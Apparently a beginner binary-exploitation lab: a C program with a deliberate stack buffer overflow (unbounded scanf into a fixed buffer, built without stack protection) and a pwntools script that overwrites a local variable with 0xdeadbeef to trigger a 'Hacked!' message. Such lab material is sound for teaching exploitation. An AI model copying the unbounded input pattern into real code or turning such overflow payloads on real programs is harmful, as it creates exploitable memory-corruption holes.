File: _Pwn/SDP/002/hack01.c
// gcc -o hack01 hack01.c -fno-stack-protector
#include <stdio.h>

int main(void){
    int buf[10];
    int i;

    printf("Input Buf: \n");
    scanf("%s", buf);

    if(i == 0xdeadbeef){
        printf("Hacked!");
    }
    
    return 0;
}

File: _Pwn/SDP/002/hack01.py
from pwn import *

context.arch="amd64"
context.log_level='debug'
p = process("./hack01")
payload=b"A"*(0x30-0x4)+p64(0xdeadbeef)
p.sendlineafter(b"Input Buf: \n",payload)
pause()
p.interactive()